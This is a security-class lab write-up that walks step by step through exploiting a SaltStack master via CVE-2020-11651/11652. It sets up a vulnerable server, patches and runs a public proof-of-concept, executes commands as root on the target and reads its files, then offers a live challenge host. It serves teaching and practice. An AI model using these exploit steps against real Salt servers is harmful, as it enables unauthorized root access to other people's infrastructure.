W 401: Command Injection on Salt (30 pts extra)

What You Need

Purpose

To practice exploiting Salt, a popular server administration utility.

Create a Target Server

Create a new Debian 9 server on the Google Cloud, with the default settings, including a 10 GB disk.

Installing Salt

In an SSH session on your target server, execute these commands, one at a time, watching to see if any of them return errors:
sudo apt update
sudo apt install git python-dev python-setuptools python-pip -y

sudo python -m pip install pyyaml
sudo python -m pip install tornado
sudo python -m pip install jinja2
sudo python -m pip install msgpack
sudo python -m pip install zmq

git clone git://github.com/saltstack/salt
cd salt
git tag
You see a list of available versions, as shown below.

Execute these commands, one at a time, watching to see if any of them return errors:

git checkout v3000.1
sudo python setup.py install --force
It takes a few minutes to compile Salt. It should complete without errors.

Launching Salt

On your target server, execute these commands:
sudo salt-master -d
sudo ss -pant
You should see "salt-master" listening on ports 4505 and 4506, as shown below.

Finding the Target IP Address

On your target server, execute this command:
ip a
Find your target server's IP address, as shown below.

Preparing the Attack Server

Create another Debian 9 server on the Google Cloud, with the default settings, including a 10 GB disk.

Installing a PoC Exploit

In an SSH session on your attack server, execute these commands, one at a time, watching to see if any of them return errors:
sudo apt update
sudo apt install git python3-pip -y
pip3 install salt

git clone https://github.com/jasperla/CVE-2020-11651-poc.git
cd CVE-2020-11651-poc/

nano exploit.py
Scroll down to find the "check_salt_version" function, as shown below.

Fixing the Exploit

This exploit is defective. To fix it, change the word False that's outlined in yellow in the image above to True, as shown below.

Type Ctrl+X, Y, Enter to save the file.

Exploiting the Target Server

On your attack server, execute this command, adjusting the IP address to match the IP address of your target server.
python3 exploit.py --master 10.128.0.12
The exploit should work, returning a long root key, as shown below.

Flag W 401.1: salt-key (15 pts)

On your attack server, execute these commands, adjusting the IP address to match the IP address of your target server.
python3 exploit.py --master 10.128.0.12 --exec "salt-key > /foo"

python3 exploit.py --master 10.128.0.12 -r /foo
You see a list of key types. The flag is covered by a green rectangle in the image below.

Flag W 401.2: saltflag (15 pts)

Exploit this server: salt.samsclass.info

It's running Salt on port 44506.

Read this file to see the flag:

/saltflag/saltflag.txt
Hint: fix the exploit code so you can run it and read its help message.

References

PoC exploit for CVE-2020-11651 and CVE-2020-11652
https://www.digitalocean.com/community/tutorials/an-introduction-to-saltstack-terminology-and-concepts


Posted 5-6-2020